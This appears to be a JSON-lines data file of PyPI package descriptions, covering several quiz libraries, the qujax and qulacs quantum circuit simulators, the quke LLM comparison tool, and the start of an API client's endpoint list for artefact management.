Further customizations depend on the question type.A minimal 2-question example might look like this:fromquizpyimportQuiz,Category,MultipleChoice,Essay,Choicemc=MultipleChoice(\"Question Title\",'Is this a question?',1.0)mc.add_choice('Yes',100.00,'Correct, horse!')mc.add_choice('No',-100.00,'Na-ahh')mc.add_choice('Maybe?',0.0,'Na-ahh')blabber=Essay(\"Psychology Question\",\"How does coding an exam make you feel?\",1.0,response_template=\"Great!\")example_quiz=Quiz()example_questions=example_quiz.add_category(\"Example questions\")example_questions.questions.extend([mc,blabber])example_quiz.export('example_quiz.xml')DocumentationA full documentation can be found onReadTheDocs.\nPlease, also have a look in theexamplesfolder to quickly see how a question type is used."} +{"package": "quizpython", "pacakge-description": "No description available on PyPI."} +{"package": "quizr_utilities", "pacakge-description": "UNKNOWN"} +{"package": "quizstarr", "pacakge-description": "Quizz Starr!!!This is a simple CLI app.\nIt generates randoms questions from Open Trivia API and stores the generated questions in json in question.json (multiple choice and boolean questions)Each user is able to signup/login and choose the number of questions he/she wants to answer.REQUIREMENTsPython 3.8PyPIINSTALLDownload python 3.8 (add python to path during installation)pip install quizstarrPLAY/RUNopen cmd as an administratorinput python -m quizstarr"} +{"package": "quizz", "pacakge-description": "quizzWrappers around Python's print and input functions to create question/answer themed command line applications. Seeexamplesfolder for real life applications.DocumentationInstallationSimply install using pip:pip install quizzquizz supports Python version 3.7 and onwards.Basic usageHere is a basic snippet. It will prompt for the user's name and\noutput it in a formatted sentence, try running it yourself:fromquizzimportQuestionquestion=Question(\"What is your name?\")question.ask()print(\"Your name is: \"+question.answer)As you can see, this is not very useful. We could have constructed same\nprogram withinputfunction as well. As we discover more onQuestionwe will see how to exploit it to construct more useful question clauses.\nIf you run this snippet you will see that it behaves a bit different frominputfunction:It will re-ask the question in case of an empty answerIt will strip spaces from the answerThis is due to defaultQuestionconfiguration (namely question scheme).\nThese behaviour can be customized and respectively correspond torequiredandstripfields.Question fieldsThere are bunch of fields that define a behaviour of a question. Lets\nsee each of these options and what they do:promptThe prompt of the question.validatorsA list that contains validators or callable objects which will validate the given answers.\nSee Validators section to learn more.optionsList ofOptionobjects. See Options section to learn more.commandsA list that containsCommandclasses or objects. These commands will be available\nin this questions context. See Commands section to learn more.correct_answersA list of strings that are counted as correct answers. The valuehas_correct_answerofQuestionobjects will depend on this list. 
If the correct answer is anOptionobject, the string must correspond tovalueof the option rather than theexpression.Example:question=Question(\"1+2?\",correct_answers=[\"3\"])question.ask()# Assuming the answer was correct, this will be True:is_correct=question.has_correct_answerextraA user defined dictionary that contains any other extra information about the question.\nThis is useful especially in aQuizcontext if you want to create relations between\nquestions with any arbitrary data. For example, let's say you set up a quiz in which\neach question has its own points. In this case you can assign point value to each question\nthrough this field.requiredTrueA boolean, ifTruemarks the question as required. Required questions will be asked\nuntil the user provides a non-empty input. Otherwise the question can be left blank (in which\ncase the answer attribute of the question object will be None).stripTrueA boolean, if set toTruewill callstripfunction for the given input.suffixA string that will be appended to the given prompt.prefixA string that will be prepended to the given prompt.command_delimiter!A string that will mark the start of a command. See Commands section to learn more.option_indicator)A string that will determines the indicator for options. For example if set\nto]options will be outputted asvalue] expressionMultipleChoiceQuestion specific fieldschoicesA list of strings from whichOptionobjects will be generated and added to\nthe question object. The values of options will be determined by thestyleorstyle_iteratorfields.styleletterA string that will determine the style of option values. It can be one of these:letter,letter_uppercase,number,number_fromzero. These styles are quite self\nexplanatory.style_iteratorAn iterable that will determine the style of option values. If provided, this will\noverridestylefield. Useful if you want a custom style.displayhorizontalThe display style of options and values. Built-in displays arehorizontalandvertical.\nYou may implement your own display by extending MultipleChoiceQuestion. See extending section\nto learn more.Scheme objectsAs it can be seen, there are quite several fields to define a behaviour ofQuestion.\nBut this can be tedious if you want to use same fields for multiple questions.\nThis is whereSchemeobjects come in handy.Schemeobjects can be defined just likeQuestionobjects, expectpromptfield is not required. For example:my_scheme=Scheme(required=False,commands=[Help,Skip])question=Question(\"Howdy?\",scheme=my_scheme)You can also pass fields forQuestioneven if you assign a scheme. In such case,\nimmutable fields will be overridden. Lists and dictionaries will be extended.\nIf there is a key clash in dictionary, the value given inQuestionfield will be used instead.\nIf the value of field defined inSchemeisNoneit will be discarded (fields ofQuestionwill be used).\nThis behaviour is also true when applying multiple schemes.Quizzes can also take scheme objects. In that case, each question in the\nquiz will have the scheme object mountedafter their initialization. 
So,\nfor aQuestionthe order ofscheme mounting can be described as:Question fields > Scheme of the Question > Scheme of QuizKeep in mind that a particular scheme will only get mounted once,\nif you want to mount a scheme twice for any reason, you have to useupdate_schemeandupdatemethods whileforceandforce_schemekeyword arguments set toTrue, respectively in the\ncontexts ofQuestionandQuiz.Option objectsMajority of the time, the answer to a question needs to be selected from\na set of options.Optionclass is the way of defining these options. For\nexample:yes,no=Option(value=\"y\",expression=\"Yes\"),Option(value=\"n\",expression=\"No\")question=Question(\"Are you OK?\",options=[yes,no])question.ask()# The answer will be an Option object (yes, no)answer=question.answerIn the example above, if the user inputs anything other than option\nvalues (\"y\" and \"n\"), aValidationErrorwill occur internally and\nthe question will be re-asked.Includingoptionsmeans that the question will no longer accept non-option answers,\nwhile the validators passed through the related field will be discarded.\nAlso, notice that the answer is set as anOptionobject, notstr. All of these behaviour\ncan be changed by overriding thevalidateandmatch_optionmethods ofQuestion.Keep in mind that the fieldcorrect_answersuses thevalueof\ntheOptionto determine whether it is correct or not. This design is so,\nbecause you might not always have theOptionobject around as you most likely\ngenerate it in-line through list comprehensions; just like in the case\nofMultipleChoiceQuestion. If this doesn't convince you, this behaviour\ncan be changed by overridinghas_correct_answerproperty method ofQuestion.Question objectsLet's inspect question objects to find out what we can do with them\nbefore and after the answer has been given.Basic attributesAttributeDescriptionanswerThe answer given to this question, set toNonein case of no/empty answer.attemptNumber of answer attempts this question had. Attempts increase when the question gets re-asked for any reason (e.g. validation errors).quizTheQuizthis question belongs to. Set toNoneif not found in a quiz context.sequenceIndex of this question in an assignedQuiz.mounted_schemesList of schemes that are applied to this question (by any means).has_answerShorthand for:question.answer is not Nonehas_correct_answerReturns a boolean indicating whether the given answer is found incorrect_answersfield.Basic methodsMethodDescriptionaskAsks the questions by calling theinputfunction internally.update_scheme(scheme, force)Mount given scheme object. Ifforceset toTrue, signature of the scheme will be ignored.Signal mechanismsQuestions can get attributes that points to a callable. This callable will be called depending\non the the type of attribute you set. We will call thesesignals. There are currently 2 signals that\ncan be assigned to a question:pre_askandpost_answer. As their names suggest, these signals will\nbe executed just before the question is asked and when the answer attribute is set, respectively.\nThese signals take one argument, theQuestionobject. For example:question=Question(\"Howdy?\")# Set post_answer signal so that the answer is outputted# just as the answer is setquestion.post_answer=lambdaq:print(q.answer)question.ask()Signals can be helpful especially in a quiz context where the order\nof questions might be undetermined. If you want to attach a signal\nto many questions, the example above might be a bit tedious. 
In such\na case, you can inherit fromQuestionand implementpost_answer(or whichever signal you like) as astaticmethod.Other notes regarding Question objectsAvoid usingoptionsfor MultipleChoiceQuestion as the\nwhole purpose of this class is to abstract away the\nwork onOptionobjects (throughchoices). However,optionsandchoicesare compatible and can be used together.Do not refrain from extending/overridingQuestionclasses\nto add functionality apt to your purposes. They are\ndesigned to be extendable.Quiz objectsQuiz objects are the way of packing a set of questions together. These\nobjects are very useful if you want to build a test-like structure, which\nis generally the case. Apart from asking questions sequentially Quiz objects also\nprovide these functionality:Allows for commands such asNext,PreviousandJumpto traverse through questions.Tracks whether each required or non-required questions are answered via attributesis_readyandis_done, and outputs an info message in appropriate situations.Basic attributesAttributeDescriptionindexThe sequence of question that is being (or going to be) asked.inquiriesThe sum of attempts of questions.questionsThe list of questions on this quiz.schemeThe scheme of this Quiz, if none specified during initialization, this will be the default scheme.is_doneA boolean that indicates whether all the questions on the quiz has an answer.is_readySimilar tois_done, but for required questions only.required_questionsList of required questions.min_inquiriesMinimum number ofQuestionattempts needed before the quiz can be finished.Basic methodsMethodDescriptionstartStarts the quiz by asking the first question.update(force_scheme)Assigns theQuizobject for each question on the quiz, along with its scheme. You need to call this if you mutate the list of questions after initialization.CommandsCommands are provided per-question basis, and they are the way of providing\nmeta. Commands can be executed via specified command delimiter (default!), and\nneed to be present (as classes or objects) incommandsfield.\nYou can create your own commands throughCommandclass. Commands return an\nopcode (throughopcodesenum) which determines what to do after the execution.\nHere are the available opcodes and what they do:opcodeDescriptionCONTINUERe-asks the question.BREAKBreak out of the question loop, thus end the input stream.JUMPQuizReturn this along with a question sequence to ask that question next.Aside from these opcodes, you can also return nothing (None), in which case\nthe question will not be re-asked unless it is required.Built-in commandsCommandExpressionDescriptionopcode(s) returnedSkipskipSet the answer of this question toNoneNoneQuitquitCallssys.exit(0), thus exiting the whole program.N/AHelp(message=\"\", with_command_list=True)helpOutputs given help message. Ifwith_command_listis set toTrue, it will also output list of available commands with their description.CONTINUEJumpjump Jumps to specified question.JUMPNextnextJumps to next question.JUMPPreviouspreviousJumps to previous question.JUMPFinishfinishEnds the quiz provided that all the required questions are answered.BREAKorCONTINUEAnswersanswersOutputs the current answers for each question in the quiz.CONTINUEValidatorsValidators validate the input given to a question.ValidationErroris the\nexception class to be raised when the given input is not valid. 
Here is an\nexample implementation of a validator:fromquizzimportValidationError,Questiondefvalidate_word_count(answer):# Check if the answer has at least 5 words.count=len(answer.split())ifcount<5:raiseValidationError(\"Your answer needs at least 5 words!\")question=Question(\"Name 5 or more mammals.\",validators=[validate_word_count])The example above will check if the word has at least 5 words. If the\nuser inputs a non-valid string the question will be re-asked until a\nvalid answer has been given.Quizz also provides class-based validators (from which all the built-in validators\ninherit). You can useValidatorclass to create your own class-based validators, which\ncan also take arguments.Built-in validatorsBuilt-in validators are:MaxLengthValidatorMinLengthValidatorAlphaValidatorAlphaNumericValidatorDigitValidatorRegexValidatorBy default, class based validators take two keyword arguments:againstandmessage.againstis the value to be tested against, for exampleMaxLengthValidator's max\nlength orRegexValidator's regex pattern."} +{"package": "quizzer", "pacakge-description": "Break learning up into small task-based tests for focused study.Tests can be defined with prerequites so a student wishing to learn a\nhigher level task, but out of their depth with the task itself, can\neasily go back through the basics. By default, only the leaf\nquestions (i.e. questions that are not dependencies of other question)\nare asked. If the user gets one wrong, we push the question back on\nthe stack (so they can try again later), and also push all of that\nquestions direct dependencies onto the stack (so they can get the\nbackground they need to answer the question they got wrong).There are a number of example quizzes available in thequizzesdirectory. The example quizzes mostly focus on teaching software\ndevelopment tasks (POSIX shell utilities, Git version control, \u2026), but\nany material that can be presented in a textual prompt/response/check\nprocess should be fairly easy to develop. The quiz files are written\nin JSON, and the format should be fairly easy to understand after\nlooking through the examples.The quiz framework and answer processing are independent of the user\ninterface used to present the prompts and collect responses.\nCurrently only ainput()based command line interface exists, but\nother interfaces (e.g. a web server for browser-based interaction)\nshould be fairly straightforward.Here\u2019s an example typescript for one of the sample quizzes:$ ./pq.py quizzes/monty-python.json\nWhat is your favourite color?\n? blue\ncorrect\n\nWhat is the capital of Assyria?\n? Hmm\u2026\nincorrect\n\nWhat is your quest?\n? To seek the Holy Grail\ncorrect\n\nWhat is the capital of Assyria?\n? ?\n\nWhat is the capital of Assyria?\nSir Robin didn't know it either\n? I don't know that\ncorrect\n\nresults:\nquestion: What is your quest?\nanswers: 1/1 (1.00)\n you answered: To seek the Holy Grail\n which was: correct\n\nquestion: What is your favourite color?\nanswers: 1/1 (1.00)\n you answered: blue\n which was: correct\n\nquestion: What is the capital of Assyria?\nanswers: 1/2 (0.50)\n you answered: Hmm\u2026\n which was: incorrect\n you answered: I don't know that\n which was: correct\n\nanswered 3 of 4 questions\nof the answered questions, 3 (1.00) were answered correctlyThe unanswered question (\u201cWhat is your name?\u201d) wasn\u2019t asked because\nthe user successfully answered the question that depended on it (\u201cWhat\nis your quest?\u201d).Quizzer requires Python \u2265 3.3. 
If Pygments is installed, the command line prompt will be colored."} +{"package": "quizzes", "pacakge-description": "No description available on PyPI."} +{"package": "quizzical", "pacakge-description": "Quizzical. Introduction: Quizzical is a terminal-based quiz game, using The Open Trivia Database as the back end. Installing: The package can be installed using pipx: $ pipx install quizzical Once installed, run the quizzical command. Playing the game: Hopefully the interface is pretty straightforward: run up the application, use the New button to create a new quiz with your choice of parameters, and use the Run button to play a game. When you run a new game you'll be shown the parameters, and once you start you'll be shown a series of questions; press keys 1, 2, 3 or 4 to answer each one. Once the quiz is over you can view your results and see which answers were right and which were wrong. Getting help: If you need help, or have any ideas, please feel free to raise an issue or start a discussion. TODO: Things I'm considering adding or addressing: Add session token support (less frequent question repeats). More quiz information in the main quiz list. Record scores for each game played, provide a history view. Allow answering a question with the mouse."} +{"package": "quizzii1", "pacakge-description": "quizz quizz To print the value, call the fib_next variable; print is not needed."} +{"package": "qujax", "pacakge-description": "qujax Contents: Installation, Quick start, Pure state simulation, Mixed state simulation, Converting from TKET, Examples, Contributing, Citing qujax, API Reference. qujax is a JAX-based Python library for the classical simulation of quantum circuits. It is designed to be simple, fast and flexible. It follows a functional programming design by translating circuits into pure functions. This allows qujax to seamlessly interface with JAX, enabling direct access to its powerful automatic differentiation tools, just-in-time compiler, vectorization capabilities, GPU/TPU integration and growing ecosystem of packages. qujax can be used both for pure and for mixed quantum state simulation. It not only supports the standard gate set, but also allows user-defined custom operations, including general quantum channels, enabling the user to e.g. model device noise and errors. An overview of the core functionalities of qujax can be found in the Quick start section. More advanced use-cases, including the training of parameterised quantum circuits, are listed in Examples. Installation: qujax is hosted on PyPI and can be installed via the pip package manager: pip install qujax Quick start. Important note: qujax circuit parameters are expressed in units of $\pi$ (e.g.
in the range $[0,2]$ as opposed to $[0, 2\\pi]$).Pure state simulationWe start by defining the quantum gates making up the circuit, along with the qubits that they act on and the indices of the parameters for each gate.A list of all gates can be foundhere(custom operations can be included bypassing an array or functioninstead of a string).fromjaximportnumpyasjnpimportqujax# List of quantum gatescircuit_gates=['H','Ry','CZ']# Indices of qubits the gates will be applied tocircuit_qubit_inds=[[0],[0],[0,1]]# Indices of parameters each parameterised gate will usecircuit_params_inds=[[],[0],[]]qujax.print_circuit(circuit_gates,circuit_qubit_inds,circuit_params_inds);# q0: -----H-----Ry[0]-----\u25ef---# |# q1: ---------------------CZ--We then translate the circuit to a pure functionparam_to_stthat takes a set of parameters and an (optional) initial quantum state as its input.param_to_st=qujax.get_params_to_statetensor_func(circuit_gates,circuit_qubit_inds,circuit_params_inds)param_to_st(jnp.array([0.1]))# Array([[0.58778524+0.j, 0. +0.j],# [0.80901706+0.j, 0. +0.j]], dtype=complex64)The optional initial state can be passed toparam_to_stusing thestatetensor_inargument. When it is not provided, the initial state defaults to $\\ket{0...0}$.Note that qujax represents quantum states asstatetensors. For example, for $N=4$ qubits, the corresponding vector space has $2^4$ dimensions, and a quantum state in this space is represented by an array with shape(2,2,2,2). The usual statevector representation with shape(16,)can be obtained by calling.flatten()or.reshape(-1)or.reshape(2**N)on this array.In the statetensor representation, the coefficient associated with e.g. basis state $\\ket{0101}$ is given byarr[0,1,0,1]; each axis corresponds to one qubit.param_to_st(jnp.array([0.1])).flatten()# Array([0.58778524+0.j, 0.+0.j, 0.80901706+0.j, 0.+0.j], dtype=complex64)Finally, by defining an observable, we can map the statetensor to an expectation value. A general observable is specified using lists of Pauli matrices, the qubits they act on, and the associated coefficients.For example, $Z_1Z_2Z_3Z_4 - 2 X_3$ would be written as[['Z','Z','Z','Z'], ['X']], [[1,2,3,4], [3]], [1., -2.].st_to_expectation=qujax.get_statetensor_to_expectation_func([['Z']],[[0]],[1.])Combiningparam_to_standst_to_expectationgives us a parameter to expectation function that can be automatically differentiated using JAX.fromjaximportvalue_and_gradparam_to_expectation=lambdaparam:st_to_expectation(param_to_st(param))expectation_and_grad=value_and_grad(param_to_expectation)expectation_and_grad(jnp.array([0.1]))# (Array(-0.3090171, dtype=float32),# Array([-2.987832], dtype=float32))Mixed state simulationMixed state simulations are analogous to the above, but with calls toget_params_to_densitytensor_funcandget_densitytensor_to_expectation_funcinstead.param_to_dt=qujax.get_params_to_densitytensor_func(circuit_gates,circuit_qubit_inds,circuit_params_inds)dt=param_to_dt(jnp.array([0.1]))dt.shape# (2, 2, 2, 2)dt_to_expectation=qujax.get_densitytensor_to_expectation_func([['Z']],[[0]],[1.])dt_to_expectation(dt)# Array(-0.3090171, dtype=float32)Similarly to a statetensor, which represents the reshaped $2^N$-dimensional statevector of a pure quantum state, adensitytensorrepresents the reshaped $2^N \\times 2^N$ density matrix of a mixed quantum state. 
This densitytensor has shape(2,) * 2 * N.For example, for $N=2$, and a mixed state $\\frac{1}{2} (\\ket{00}\\bra{11} + \\ket{11}\\bra{00} + \\ket{11}\\bra{11} + \\ket{00}\\bra{00})$, the corresponding densitytensordtis such thatdt[0,0,1,1] = dt[1,1,0,0] = dt[1,1,1,1] = dt[0,0,0,0] = 1/2, and all other entries are zero.The equivalent density matrix can be obtained by calling.reshape(2 ** N, 2 ** N).Converting from TKETOne can directly convert apytketcircuit using thetk_to_qujaxandtk_to_qujax_symbolicfunctions in thepytket-qujaxextension.An example of this can be found in thepytket-qujax_heisenberg_vqe.ipynbnotebook.ExamplesBelow are some use-case notebooks. These both illustrate the flexibility of qujax and the power of directly interfacing with JAX and its package ecosystem.heisenberg_vqe.ipynb- an implementation of the variational quantum eigensolver to find the ground state of a quantum Hamiltonian.maxcut_vqe.ipynb- an implementation of the variational quantum eigensolver to solve a MaxCut problem. Trains with Adam viaoptaxand uses more realistic stochastic parameter shift gradients.noise_channel.ipynb- uses the densitytensor simulator to fit the parameters of a depolarising noise channel.qaoa.ipynb- uses a problem-inspired QAOA ansatz to find the ground state of a quantum Hamiltonian. Demonstrates how to encode more sophisticated parameters that control multiple gates.barren_plateaus.ipynb- illustrates how to sample gradients of a cost function to identify the presence of barren plateaus. Uses batched/vectorized evaluation to speed up computation.reducing_jit_compilation_time.ipynb- explains how JAX compilation works and how that can lead to excessive compilation times when executing quantum circuits. Presents a solution for the case of circuits with a repeating structure.variational_inference.ipynb- uses a parameterised quantum circuit as a variational distribution to fit to a target probability mass function. Uses Adam viaoptaxto minimise the KL divergence between circuit and target distributions.classification.ipynb- train a quantum circuit for binary classification using data re-uploading.generative_modelling.ipynb- uses a parameterised quantum circuit as a generative model for a real life dataset. Trains via stochastic gradient Langevin dynamics on the maximum mean discrepancy between statetensor and dataset.Thepytketrepository also containstk_to_qujaximplementations for some of the above atpytket-qujax_classification.ipynb,pytket-qujax_heisenberg_vqe.ipynbandpytket-qujax_qaoa.ipynb.ContributingYou can open a bug report or a feature request by creating a newissue on GitHub.Pull requests are welcome! To open a new one, please go through the following steps:First fork the repo and create your branch fromdevelop.Commit your code and tests.Update the documentation, if required.Check the code lints (runblack . --checkandpylint */).Issue a pull request into thedevelopbranch.New commits ondevelopwill be merged intomainin the next release.Citing qujaxIf you have used qujax in your code or research, we kindly ask that you cite it. You can use the following BibTeX entry for this:@article{qujax2023,author={Duffield, Samuel and Matos, Gabriel and Johannsen, Melf},doi={10.21105/joss.05504},journal={Journal of Open Source Software},month=sep,number={89},pages={5504},title={{qujax: Simulating quantum circuits with JAX}},url={https://joss.theoj.org/papers/10.21105/joss.05504},volume={8},year={2023}}"} +{"package": "qujian1", "pacakge-description": "Example PackageThis is a simple example package. 
You can useGithub-flavored Markdownto write your content."} +{"package": "quke", "pacakge-description": "qukeCompare the answering capabilities of different LLMs - for example LlaMa, ChatGPT, Cohere, Falcon - against user provided document(s) and questions.Explore the docs \u00bbReport Bug\u00b7Request FeatureTable of ContentsAbout The ProjectBuilt WithGetting StartedPrerequisitesInstallationUsageBaseSpecify models and embeddingsExperimentsConfigurationSearch your own documentsLimitationsPrivacyLicenseContactAbout The ProjectCompare the answering capabilities of different LLMs - for example LlaMa, ChatGPT, Cohere, Falcon - against user provided document(s) and questions.Specify the different models, embedding tools and vector databases in configuration files.Maintain reproducable experiments reflecting combinations of these configurations.(back to top)Getting StartedPrerequisitesPoetryThe instructions assume a Python environment withPoetryinstalled. Development of the tool is done in Python 3.11. While Poetry is not actually needed for the tool to function, the examples assume Poetry is installed.API keysThe tool uses 3rd party hosted inference APIs. API keys need to be specified as environment variables.The services used:HuggingFaceOpenAICohereReplicateThe API keys can be specied in a.env file. Use the provided .env.example file as an example (enter your own API keys and rename it to '.env').At present, all services used in the example configuration have free tiers available.(back to top)InstallationNavigate to the directory that contains the pyproject.toml file, then execute thepoetryinstallcommand.(back to top)UsageFor the examples the project comes with a public financial document for a Canadian Bank (CIBC) as source pdf file.BaseIn order to run the first example, ensure to specify your HuggingFace API key.Use the commandpoetryrunquketo ask the default questions, using the default embedding and the default LLM.The answers provided by the LLM - in addition to various other logging messages - are saved in the ./output/ or ./multirun directories in separate date and time subdirectories, including in a file calledchat_session.md.The defaults are specified in the config.yaml file (in the ./quke/conf/ directory).(back to top)Specify models and embeddingsEnsure to specify your Cohere API key before running.As per the configuration files, the default LLM is Falcon and the default embedding uses HuggingFace embedding.To specify a different LLM - Cohere in this example - run the following:poetryrunqukeembedding=huggingfacellm=coherequestion=eps(back to top)ExperimentsEnsure to specify your OpenAI API key before running.The LLMs, embeddings, questions and other configurations can be captured in experiment config files. The commandpoetryrunquke+experiment=openaiuses an experiment file openai.yaml (see folder ./config/experiments) which specifies the LLM, embedding and questions to be used. It is equivalent to running:poetryrunqukeembedding=openaillm=gpt3-5question=epsMultiple experiments can be run at once as follows:Ensure to specify your Replicate API key before running.poetryrunquke--multirun+experiment=openai,llama2(back to top)ConfigurationLLMs, embeddings, questions, experiments and other items are specified in a set of configuration files. These are saved in the ./config directory.TheHydrapackage is used for configuration management. 
Their website explains more about the configuration system in general.Four different models are specified (ChatGPT, LlaMa2, Falcon, and Cohere); using 4 different APIs (OpenAI, HuggingFace, Cohere and Replicate).Additional LLMs (or embeddings, questions) can be set up by adding new configuration files.(back to top)Search your own documentsThe documents to be searched are stored in the ./docs/pdf directory. At present only pdf documents are considered.\nNote to setvectorstore_write_modetoappendoroverwritein the embedding configuration file (or delete the folder with the existing vector database, in the ./idata folder).(back to top)LimitationsThe free tiers for the third party services generally come with fairly strict limitations. They differ between services; and may differ over time.To try out the tool with your own documents it is best to start with a single small source document, no more than two questions and only one combination of LLM/embedding.Error messages due to limitations of the APIs are not always clearly indicated as such.(back to top)PrivacyThe tool uses third party APIs (OpenAI, HuggingFace, Cohere, Replicate). These process your source documents and your questions, to the extent that you provide these. They track your usage of their APIs. They may do other things; I do not know.The tool uses theLangChainPython package to interact with the third party services. I do not know if the package 'leaks' any of the data in any way.In general I do not know to what extent any of the data is encrypted during transmission.The tool shares no information with me.(back to top)Built With(back to top)LicenseDistributed under the MIT License. SeeLICENSE.txtfor more information.(back to top)ContactProject Link:https://github.com/ejoosterop/quke(back to top)"} +{"package": "qulacs", "pacakge-description": "QulacsQulacs is a Python/C++ library for fast simulation of large, noisy, or parametric quantum circuits.\nQulacs is developed at QunaSys, Osaka University, NTT, and Fujitsu.Qulacs is licensed under theMIT license.Quick Install for Pythonpip install qulacsIf your CPU is older than Intel Haswell architecture, the binary installed with the above command does not work. In this case, please install Qulacs with the following command.\nEven if your CPU is newer than Haswell, Qulacs installed with the below command shows better performance but takes a longer time. See \"Install Python library from source\" section for detail.pip install git+https://github.com/qulacs/qulacs.gitIf you have NVIDIA GPU and CUDA is installed, GPU-version can be installed with the following command:pip install qulacs-gpuFeaturesNoteQulacs-Osaka/qulacs-osaka was integrated into the qulacs/qulacs. 
For more details, please refer toInformationsection.Fast quantum circuit simulation with parallelized C/C++ backendNoisy quantum gate for simulation of NISQ devicesParametric quantum gates for variational methodsCircuit compression for fast simulationGPU support for fast simulationMany utility functions for researchPerformanceThe time for simulating random quantum circuits is compared with several quantum circuit simulators in November 2020.Seethe benchmark repositoryandSection VI and VII of our paperfor the detail of this benchmark.Note that the plots with names ending with \"opt\" and \"heavy opt\" perform circuit optimization for fast simulation, where the time for optimization is included in the execution time.Single-thread benchmarkMulti-thread benchmarkGPU benchmarkInstall Python library from sourceTo install Qulacs optimized for your system, we recommend the following install procedure for faster simulation of quantum circuits, while this requires a compiler and takes time for installation. In addition, you can enable or disable optimization features such as SIMD optimization, OpenMP parallelization, and GPU support.A binary that is installed via pip command is optimized for Haswell architecture. Thus, Qulacs installed via pip command does not work with a CPU older than Haswell. If your CPU is newer than Haswell, Qualcs built from source shows the better performance.RequirementsC++ compiler (gcc or VisualStudio)gcc/g++ >= 7.0.0 (checked in Linux, MacOS, cygwin, MinGW, and WSL)Microsoft VisualStudio C++ 2015 or laterBoost>= 1.71.0 (Minimum version tested in CI)Python >= 3.7CMake >= 3.0git(option) CUDA >= 8.0(option) AVX2 supportIf your system supports AVX2 instructions, SIMD optimization is automatically enabled.\nIf you want to enable GPU simulator, install qulacs throughqulacs-gpupackage or build from source.\nNote thatqulacs-gpuincludes CPU simulator. 
You don't need to install both.Qulacs is tested on the following systems.Ubuntu 20.04macOS Big Sur 11Windows Server 2019If you encounter some troubles, seetroubleshooting.How to installInstall with default options (Multi-thread without GPU):pip install .If AVX2 instructions are not supported, SIMD optimization is automatically disabled.Install with GPU support (CUDA is required):USE_GPU=Yes pip install .Install single-thread Qulacs:USE_OMP=No pip install .The number of threads used in Qulacs installed with default options can be controlled via the environment variableOMP_NUM_THREADSorQULACS_NUM_THREADS.\nWhileOMP_NUM_THREADSaffects the parallelization of other libraries,QULACS_NUM_THREADScontrols only the parallelization of QULACS.\nOr, if you want to force only Qulacs to use a single thread, You can install single-thread Qulacs with the above command.For development purpose, optional dependencies can be installed as follows.# Install development tools\npip install .[dev]\n# Install dependencies for document generation\npip install .[doc]Uninstall Qulacs:pip uninstall qulacsUse Qulacs as C++ libraryBuild with GCCStatic libraries of Qulacs can be built with the following commands:git clone https://github.com/qulacs/qulacs.git\ncd qulacs\n./script/build_gcc.shTo build shared libraries, executemake sharedat./qulacs/buildfolder.\nWhen you want to build with GPU, usebuild_gcc_with_gpu.shinstead ofbuild_gcc.sh.Then, you can build your codes with the following gcc command:g++-O2-I.//include-L.//lib.cpp-lvqcsim_static-lcppsim_static-lcsim_static-fopenmpIf you want to run your codes with GPU, includecppsim/state_gpu.hppand useQuantumStateGpuinstead ofQuantumStateand build with the following command:nvcc -O2 -I .//include -L .//lib .cu -lvqcsim_static -lcppsim_static -lcsim_static -lgpusim_static -D _USE_GPU -lcublas -Xcompiler -fopenmpBuild with MSVCStatic libraries of Qulacs can be built with the following command:git clone https://github.com/qulacs/qulacs.git\ncd qulacs\nscript/build_msvc_2017.batWhen you want to build with GPU, usebuild_msvc_2017_with_gpu.bat.\nIf you use MSVC with other versions, usebuild_msvc_2015.bator edit the generator name inbuild_msvc_2017.bat.Your C++ codes can be built with Qulacs with the following process:Create an empty project.Select \"x64\" as an active solution platform.Right Click your project name in Solution Explorer, and select \"Properties\".At \"VC++ Directories\" section, add the full path to./qulacs/includeto \"Include Directories\"At \"VC++ Directories\" section, add the full path to./qulacs/libto \"Library Directories\"At \"C/C++ -> Code Generation\" section, change \"Runtime library\" to \"Multi-threaded (/MT)\".At \"Linker -> Input\" section, addvqcsim_static.lib;cppsim_static.lib;csim_static.lib;to \"Additional Dependencies\".Tutorial and API documentsSee the following documents for tutorials.Python TutorialC++ TutorialManualExamplesPython sample codefromqulacsimportObservable,QuantumCircuit,QuantumStatefromqulacs.gateimportY,CNOT,mergestate=QuantumState(3)state.set_Haar_random_state()circuit=QuantumCircuit(3)circuit.add_X_gate(0)merged_gate=merge(CNOT(0,1),Y(1))circuit.add_gate(merged_gate)circuit.add_RX_gate(1,0.5)circuit.update_quantum_state(state)observable=Observable(3)observable.add_operator(2.0,\"X 2 Y 1 Z 0\")observable.add_operator(-3.0,\"Z 2\")value=observable.get_expectation_value(state)print(value)If you want to run it on GPU, install GPU-enabled qulacs and replaceQuantumStatein the above codes withQuantumStateGpu.C++ sample 
code#include#include#include#include#include#includeintmain(){QuantumStatestate(3);state.set_Haar_random_state();QuantumCircuitcircuit(3);circuit.add_X_gate(0);automerged_gate=gate::merge(gate::CNOT(0,1),gate::Y(1));circuit.add_gate(merged_gate);circuit.add_RX_gate(1,0.5);circuit.update_quantum_state(&state);Observableobservable(3);observable.add_operator(2.0,\"X 2 Y 1 Z 0\");observable.add_operator(-3.0,\"Z 2\");autovalue=observable.get_expectation_value(&state);std::cout<v1_editions_edition_id_artefact_groups_artefact_group_id_delete:%s\\n\"%e)Documentation for API EndpointsAll URIs are relative tohttp://localhostClassMethodHTTP requestDescriptionArtefactApiv1_editions_edition_id_artefact_groups_artefact_group_id_deleteDELETE/v1/editions/{editionId}/artefact-groups/{artefactGroupId}Deletes the specified artefact group.ArtefactApiv1_editions_edition_id_artefact_groups_artefact_group_id_getGET/v1/editions/{editionId}/artefact-groups/{artefactGroupId}Gets the details of a specific artefact group in the editionArtefactApiv1_editions_edition_id_artefact_groups_artefact_group_id_putPUT/v1/editions/{editionId}/artefact-groups/{artefactGroupId}Updates the details of an artefact group. The artefact group will now only contain the artefacts listed in the JSON payload. If the name is null, no change will be made, otherwise the name will also be updated.ArtefactApiv1_editions_edition_id_artefact_groups_getGET/v1/editions/{editionId}/artefact-groupsGets a listing of all artefact groups in the editionArtefactApiv1_editions_edition_id_artefact_groups_postPOST/v1/editions/{editionId}/artefact-groupsCreates a new artefact group with the submitted data. The new artefact must have a list of artefacts that belong to the group. It is not necessary to give the group a name.ArtefactApiv1_editions_edition_id_artefacts_artefact_id_deleteDELETE/v1/editions/{editionId}/artefacts/{artefactId}Deletes the specified artefactArtefactApiv1_editions_edition_id_artefacts_artefact_id_getGET/v1/editions/{editionId}/artefacts/{artefactId}Provides a listing of all artefacts that are part of the specified editionArtefactApiv1_editions_edition_id_artefacts_artefact_id_putPUT/v1/editions/{editionId}/artefacts/{artefactId}Updates the specified artefact. There are many possible attributes that can be changed for an artefact. The caller should only input only those that should be changed. 